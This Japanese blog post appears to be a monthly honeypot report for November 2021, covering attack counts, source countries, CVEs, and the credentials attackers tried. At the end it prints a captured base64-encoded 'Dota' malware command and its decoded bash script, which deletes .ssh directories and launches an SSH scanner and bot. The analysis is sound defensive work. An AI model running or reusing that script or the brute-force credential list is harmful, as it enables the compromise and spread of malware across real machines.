Midnight Monologues

日々勉強したことを書いてきます

ハニーポット運用(月次報告:2021年11月)

12月はX-masにかけてセキュリティイベントが目白押しになる。

2021 SANS Holiday Hack Challenge & KringleCon www.sans.org

Advent of Cyber 3 (2021) tryhackme.com

後は11月~12月にかけてはAmazonサイバーマンデーが例年開催されていたが今年は実施されなかった。(「Amazonブラックフライデー」の中で実施された模様だ。) www.watch.impress.co.jp

来年はセール期間に併せて試験資格の申し込みを実施できればと思う。

T-Potにて1か月運用した結果を記載する。

今月のChangelog

 更新無し。

前提条件

運用日時:2021年11月1日-2021年11月30日
運用期間:31日

結果

①各ハニーポットで検知したAttack件数
  • T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
No ハニーポット 件数 先月比
1 Heralding 874,290 583,536
2 Cowrie 763,008 ▲120,701
3 Honeytrap 516,576 ▲233,343
4 Dionaea 453,124 33,880
5 Rdpy 84,383 8,235
6 Mailoney 15,555 4,940
7 Adbhoney 14,496 ▲1,293
8 Tanner 3,088 3,005
9 Ciscoasa 2,047 789
10 CitrixHoneypot 1,451 ▲117
11 ConPot 1,249 ▲138
12 ElasticPot 996 ▲1,737
13 Medpot 135 ▲576
  • Result
    • 10月に引き続き全体のアクセス数は低下した。
    • Heraldingの検知数がCowrieを抜いて1位に浮上した。Dionaeaの検知数が低下し、smbの脆弱性を狙う攻撃は下火になっているのかもしれない。

②攻撃元の国名と件数(Top 20)
No 攻撃元の国名 件数 先月順位
1 Russia 737,276 1(→)
2 Netherlands 607,689 2(→)
3 China 261,468 3(→)
4 United States 194,351 4(→)
5 United Kingdom 123,493 圏外(↑)
6 Brazil 106,915 7(↑)
7 Ukraine 74,093 19(↑)
8 Vietnam 68,156 6(↓)
9 India 53,357 5(↓)
10 France 37,557 圏外(↑)
11 Singapore 27,598 17(↑)
12 Sweden 26,310 13(↑)
13 Japan 24,783 11(↓)
14 Indonesia 23,771 9(↓)
15 Latvia 23,028 12(↓)
16 Iran 21,049 圏外(↑)
17 Mexico 19,777 17(→)
18 Republic of Lithuania 18,816 圏外(↑)
19 Taiwan 14,475 10(↓)
20 Venezuela 12,985 圏外(↑)

③検知したCVEの脆弱性と件数
  • Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
No CVE ID Count
1 CVE-2020-11899 1,442,569
2 CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 793
3 CVE-2020-11910 45
4 CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 24
5 CVE-2014-2321 CVE-2014-2321 3
  • Result
    • 特記事項なし

④よく攻撃されるユーザ名
  • ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
No ユーザ名 件数
1 root 101,532
2 sa 28,492
3 admin 4,187
4 user 3,470
5 22 1,341
6 hadoop 1,095
7 (empty) 1,067
8 postgres 832
9 2Wire 677
10 !root 674
11 test 602
12 anonymous 507
13 www 491
14 ftp 489
15 Admin 467
16 db 459
17 administrator 456
18 web 455
19 wwwroot 432
20 user123 415
21 data 414
22 knockknockwhosthere 414
23 www-data 410
24 support 374
25 0 360
26 666666 357
27 debug 339
28 adm 338
29 blank 337
30 unknown 325
31 nproc 267
32 pi 238
33 mos 134
34 oracle 132
35 ubuntu 116
36 guest 100
37 Sato 95
38 mysql 91
39 server 81
40 ftpuser 71
41 git 66
42 ubnt 55
43 sh 47
44 dev 41
45 nginx 41
46 miner 39
47 minecraft 37
48 dell 34
49 nick 34
50 default 32
  • Result
    • 特記事項なし

⑤よく攻撃されるパスワード
  • パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
No パスワード 件数
1 admin 26,789
2 (empty) 3,724
3 1 1,588
4 root 1,419
5 password 1,408
6 123456 1,078
7 blank 1,019
8 12345 766
9 12345678 760
10 123 524
11 666666 511
12 Samantha 491
13 1234 486
14 user 485
15 0 482
16 Password 450
17 knockknockwhosthere 420
18 00000000 408
19 master 389
20 support 380
21 ubnt 376
22 alpine 364
23 hi3518 353
24 backup 341
25 unknown 339
26 !ishtar 337
27 synnet 336
28 111111 323
29 test 296
30 zaq12wsx 264
31 nproc 261
32 1q2w3e4r 251
33 abc123 251
34 musicman 241
35 123456789 231
36 qwerty 225
37 1qaz2wsx 224
38 Passw0rd 212
39 1234567 210
40 000000 207
41 system 194
42 admin123 192
43 1234567890 176
44 123123 171
45 123qwe 170
46 iloveyou 169
47 passw0rd 163
48 Jennifer 161
49 123qwe!@# 158
50 pass 158
  • Result
    • Krane Malware関連のアクセスは多くは無いが今月も観測していた。

⑥今月のマスオさんとZmap
  • masscanの観測結果は以下の通り。 f:id:SYN-ACK:20211225233322j:plain

  • Zmapの観測結果は以下の通り。 f:id:SYN-ACK:20211225233703j:plain

  • Result

    • 特記事項は無し。

最後に

  • ブラックフライデー中のため「サイバー術 プロに学ぶサイバーセキュリティ」を購入した。現在通読中。 book.mynavi.jp

  • 来月で今年も終わり。今年受験予定だったセキュリティ資格は何もすすんでいない。

  • 今月のアクセス。 base64エンコードされたデータアクセス

IPアドレス:221[.]195[.]1[.]201

Payload  :

sleep 15s && cd /var/tmp; echo "IyEvYmluL2Jhc2gKY2QgL3RtcAkKcm0gLXJmIC5zc2gKcm0gLXJmIC5tb3VudGZzCnJtIC1yZiAuWDEzLXVuaXgKcm0gLXJmIC5YMTctdW5peApta2RpciAuWDE3LXVuaXgKY2QgLlgxNy11bml4Cm12IC92YXIvdG1wL2RvdGEudGFyLmd6IGRvdGEudGFyLmd6CnRhciB4ZiBkb3RhLnRhci5negpzbGVlcCAzcyAmJiBjZCAvdG1wLy5YMTctdW5peC8ucnN5bmMvYwpub2h1cCAvdG1wLy5YMTctdW5peC8ucnN5bmMvYy90c20gLXQgMTUwIC1TIDYgLXMgNiAtcCAyMiAtUCAwIC1mIDAgLWsgMSAtbCAxIC1pIDAgL3RtcC91cC50eHQgMTkyLjE2OCA+PiAvZGV2L251bGwgMj4xJgpzbGVlcCA4bSAmJiBub2h1cCAvdG1wLy5YMTctdW5peC8ucnN5bmMvYy90c20gLXQgMTUwIC1TIDYgLXMgNiAtcCAyMiAtUCAwIC1mIDAgLWsgMSAtbCAxIC1pIDAgL3RtcC91cC50eHQgMTcyLjE2ID4+IC9kZXYvbnVsbCAyPjEmCnNsZWVwIDIwbSAmJiBjZCAuLjsgL3RtcC8uWDE3LXVuaXgvLnJzeW5jL2luaXRhbGwgMj4xJgpleGl0IDA=" | base64 --decode | bash

 ↓
文字コード部分をPrintable形式にすると以下になる。
 ↓

#!/bin/bash
cd /tmp 
rm -rf .ssh
rm -rf .mountfs
rm -rf .X13-unix
rm -rf .X17-unix
mkdir .X17-unix
cd .X17-unix
mv /var/tmp/dota.tar.gz dota.tar.gz
tar xf dota.tar.gz
sleep 3s && cd /tmp/.X17-unix/.rsync/c
nohup /tmp/.X17-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 192.168 >> /dev/null 2>1&
sleep 8m && nohup /tmp/.X17-unix/.rsync/c/tsm -t 150 -S 6 -s 6 -p 22 -P 0 -f 0 -k 1 -l 1 -i 0 /tmp/up.txt 172.16 >> /dev/null 2>1&
sleep 20m && cd ..; /tmp/.X17-unix/.rsync/initall 2>1&
exit 0

Dota MalwareというIoT機器をターゲットにしたmalwareのようだ。

blog.edie.io